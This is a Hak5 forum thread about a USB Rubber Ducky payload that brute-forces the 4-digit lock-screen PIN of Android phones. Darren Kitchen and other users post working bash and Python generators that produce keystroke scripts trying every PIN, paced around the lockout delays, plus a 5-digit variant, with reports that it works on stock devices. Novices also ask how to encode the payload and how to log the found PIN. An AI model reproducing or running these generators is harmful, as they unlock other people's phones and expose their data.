Jump to content
Hak5 Forums
Darren Kitchen

[Payload] Android Brute Force 4-digit pin

Recommended Posts

The Ducky script works great, Major props for this Darren. I've been using a micro USB hub 3 in 1 powered with an external battery to keep the phone charged for the time needed to brute force the pin. How can I amend the Ducky script to capture the correct pin as a text file on the Ducky?

Share this post


Link to post
Share on other sites
kerravon   
On 06/12/2012 at 11:31 PM, Darren Kitchen said:

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

Hey darren,

Any chance of putting your 600k script on github so we can look at it?
cheers

Share this post


Link to post
Share on other sites
b0N3z   
echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt

5 digit 

Share this post


Link to post
Share on other sites
On 6/28/2017 at 0:36 PM, b0N3z said:

echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt

5 digit 

That will take a very long time..

Share this post


Link to post
Share on other sites
b0N3z   
10 hours ago, Dave-ee Jones said:

That will take a very long time..

as per Darren about 166hrs

Share this post


Link to post
Share on other sites

Hey I make a script to make the 4 digit combination in Python so, if you have Python just copy the code and then run it and in the output you will have the combination.

In Python was more hard to make because Python is not maked to do Bruteforce and their limit but finally I make the code so.

(I am Just 15 Years and a starter on Python so possible the code can be better than that)

Here is the code:

"""
change x=int(Put a number) Down
Put only 1-9 and copy all code
and then you have the Payload
"""
x=int(0)
number=int(0)
while (number)<=9:
  print"STRING",(str(x))+"00"+str(number)
  print"ENTER"
  if (number) in list(range(0,9,5)):
   print"DELAY 34250"
   (number)+=int(1)
  else:
   number+=int(1)
   if (number) == 10:
    while number <= int(100):
     print"STRING",(str(x))+"0"+str(number)
     print"ENTER"
     if (number) in list(range(10,100,5)):
      print"DELAY 34250"
      (number)+=int(1)
     else:
      (number)+=int(1)
      if (number) == int(100):
       while number != int(1000):
         print"STRING",(str(x))+str(number)
         print"ENTER"
         if (number) in list(range(100,999,5)):
          print"DELAY 34250"
          (number)+=int(1)
         else:
          (number)+=int(1)
          if (number) == int(1000):
           x+=int(1)
           break

Share this post


Link to post
Share on other sites
On ‎12‎/‎12‎/‎2012 at 5:36 PM, keb0x80 said:

I created a script to generate pretty much the same output using only bash loops/conditions

 


#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
  count=$((count+1))
  echo "STRING $pin"
  # After every other pin, do this
  if [ $((count % 2)) -eq 0 ]; then
    echo "DELAY 1000"
    echo "ENTER"
    echo "ENTER"
  fi
  # After 5 pins, do this
  if [ $((count % 5)) -eq 0 ]; then
    for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) ))
    do
	  echo "DELAY 5000"
	  echo "ENTER"
    done
  fi
done
[/CODE]

 

I'm on the duck tool kit.com and when I put this is the encoder it rejects it as "does not recognize  !in bash.  What am I doing wrong?

Share this post


Link to post
Share on other sites
On ‎12‎/‎6‎/‎2012 at 7:38 PM, Darren Kitchen said:

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

 

On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

Im in duck tool kit.com and trying to use this script but it doesn't work.  What am I doing wrong?

Share this post


Link to post
Share on other sites
On ‎6‎/‎30‎/‎2017 at 0:15 PM, b0N3z said:

as per Darren about 166hrs

Im on the duck tool kit and I can't see to get the script to work. any insight?

Share this post


Link to post
Share on other sites
b0N3z   

The script is made to run in a bash terminal to create the text file needed to make the inject.bin file for the ducky.  This wont work with just trying to convert the command.

Share this post


Link to post
Share on other sites
On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

 


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

So how do I use this code on your duck tool kit.com site?

Share this post


Link to post
Share on other sites
b0N3z   
On 7/5/2017 at 6:24 PM, TTT101907 said:

So how do I use this code on your duck tool kit.com site?

Do you have linux?

Share this post


Link to post
Share on other sites
dyurnoev   

hi, im a newbie :P ..  how i can on Encode this code for work and create Inject.bin?

then put into Android Smartphone with USB rubber Ducky?


Because the code

#!/bin/bashclearecho -e "========================================================"echo -e " This script downloads the rockyou password list"echo -e " 
	

 

IT SAYS that is not language appropriate and i can't create inject file on duckytools.THanks

 

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Recently Browsing   0 members

    No registered users viewing this page.

×